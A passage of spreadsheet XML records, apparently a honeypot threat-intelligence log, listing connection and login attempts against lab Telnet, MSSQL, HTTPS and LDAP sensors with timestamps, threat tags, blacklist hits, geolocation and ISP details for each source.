    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:b516"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1956"/>
    <x v="1956"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:43:27"/>
    <d v="2025-04-13T19:43:27"/>
    <d v="2025-04-13T19:43:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b698:1066"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1957"/>
    <x v="1957"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:39:57"/>
    <d v="2025-03-05T02:47:34"/>
    <d v="2025-04-13T19:39:57"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Navpada)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1048"/>
    <s v="72.8486"/>
    <s v="138296"/>
    <s v="Juweriyah Networks Private Limited"/>
    <s v="Ankhnet"/>
    <s v="business"/>
    <s v="Ankhnet Informations Pvt. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cab3:494b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1958"/>
    <x v="1958"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:26:30"/>
    <d v="2025-04-13T19:26:30"/>
    <d v="2025-04-13T19:26:30"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:c1e9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1959"/>
    <x v="1959"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:10:22"/>
    <d v="2024-03-16T16:22:23"/>
    <d v="2025-04-13T19:10:22"/>
    <n v="737"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;27382&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RO"/>
    <s v="Rondônia"/>
    <s v="Porto Velho"/>
    <s v="Porto Velho"/>
    <s v="3662762"/>
    <s v="NA"/>
    <s v="-8.76356"/>
    <s v="-63.8972"/>
    <s v="270705"/>
    <s v="WILLAMES FERREIRA SANTOS - ME"/>
    <s v="W F SANTOS LTDA"/>
    <s v="business"/>
    <s v="OSN de GREGORI TELECOM"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bd7f:9795"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1960"/>
    <x v="1960"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:10:09"/>
    <d v="2024-02-01T10:55:00"/>
    <d v="2025-04-13T19:10:09"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;43040&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:378c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1961"/>
    <x v="1961"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T19:03:53"/>
    <d v="2025-04-13T19:03:53"/>
    <d v="2025-04-13T19:03:53"/>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7:12ee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1962"/>
    <x v="1962"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:49:21"/>
    <d v="2024-11-21T22:06:06"/>
    <d v="2025-04-13T18:49:21"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay-Static"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:1a6e"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1963"/>
    <x v="1963"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:34:48"/>
    <d v="2025-04-13T18:34:48"/>
    <d v="2025-04-13T18:34:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Mumbai"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb4:b11b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1964"/>
    <x v="1964"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:32:44"/>
    <d v="2025-04-13T18:32:44"/>
    <d v="2025-04-13T18:32:44"/>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df:5d2b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1965"/>
    <x v="1965"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:28:09"/>
    <d v="2025-04-13T18:28:09"/>
    <d v="2025-04-13T18:28:09"/>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3:c5a3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1966"/>
    <x v="1966"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:16:44"/>
    <d v="2025-04-13T18:16:44"/>
    <d v="2025-04-13T18:16:44"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b58:ad5a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1967"/>
    <x v="1967"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:12:18"/>
    <d v="2025-04-11T23:57:14"/>
    <d v="2025-04-13T18:12:18"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;abuseipdb"/>
    <s v="8443&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="AU"/>
    <s v="Australia"/>
    <s v="NSW"/>
    <s v="New South Wales"/>
    <s v="Sydney"/>
    <s v="Alexandria"/>
    <s v="2178136"/>
    <s v="2015"/>
    <s v="-33.9088"/>
    <s v="151.196"/>
    <s v="14061"/>
    <s v="DigitalOcean, LLC"/>
    <s v="DigitalOcean, LLC"/>
    <s v="hosting"/>
    <s v="DigitalOcean, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2g'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2h'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d126:163a"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1968"/>
    <x v="1968"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:11:36"/>
    <d v="2025-04-12T08:04:15"/>
    <d v="2025-04-13T18:11:36"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_LDAP_HC1&amp;&amp;abuseipdb"/>
    <s v="389&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Rappahannock"/>
    <s v="Washington"/>
    <s v="4792307"/>
    <s v="22747"/>
    <s v="38.7134"/>
    <s v="-78.1591"/>
    <s v="8075"/>
    <s v="Microsoft Corporation"/>
    <s v="Microsoft Corporation"/>
    <s v="business"/>
    <s v="Microsoft Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_LDAP:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:30d9:e857"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1969"/>
    <x v="1969"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T18:02:13"/>
    <d v="2025-04-13T18:02:13"/>
    <d v="2025-04-13T18:02:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e7:80b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1970"/>
    <x v="1970"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T17:49:57"/>
    <d v="2025-04-13T17:48:58"/>
    <d v="2025-04-13T17:49:57"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Wimax Project"/>
    <s v="2007-08-01"/>
    <s v="WiMAX-BB"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:5cd3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1971"/>
    <x v="1971"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T17:20:59"/>
    <d v="2025-04-07T20:57:08"/>
    <d v="2025-04-13T17:20:59"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Chennai"/>
    <s v="1264527"/>
    <s v="600001"/>
    <s v="13.0827"/>
    <s v="80.2707"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Torrent Pharmaceuticals Ltd."/>
    <s v="2004-05-17"/>
    <s v="TORR-4303178-NA"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3df6:6bf2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1972"/>
    <x v="1972"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T17:15:07"/>
    <d v="2025-04-13T17:15:07"/>
    <d v="2025-04-13T17:15:07"/>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1:3c63"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1973"/>
    <x v="1973"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T17:09:48"/>
    <d v="2025-04-13T17:09:48"/>
    <d v="2025-04-13T17:09:48"/>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a:85ae"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1974"/>
    <x v="1974"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T17:04:26"/>
    <d v="2025-04-13T17:03:46"/>
    <d v="2025-04-13T17:04:26"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="66"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Patna"/>
    <s v="Patna (Police Colony)"/>
    <s v="1260086"/>
    <s v="800001"/>
    <s v="25.5819"/>
    <s v="85.0818"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2010-09-14"/>
    <s v="BHARTI-MO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfe2:7e21"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1975"/>
    <x v="1975"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T17:03:46"/>
    <d v="2025-04-13T17:03:46"/>
    <d v="2025-04-13T17:03:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Kanniyakumari"/>
    <s v="Kuzhithurai"/>
    <s v="1265387"/>
    <s v="NA"/>
    <s v="8.31792"/>
    <s v="77.1919"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BB Multiplay"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:4128"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1976"/>
    <x v="1976"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T16:38:15"/>
    <d v="2024-04-23T10:51:19"/>
    <d v="2025-04-13T16:38:15"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
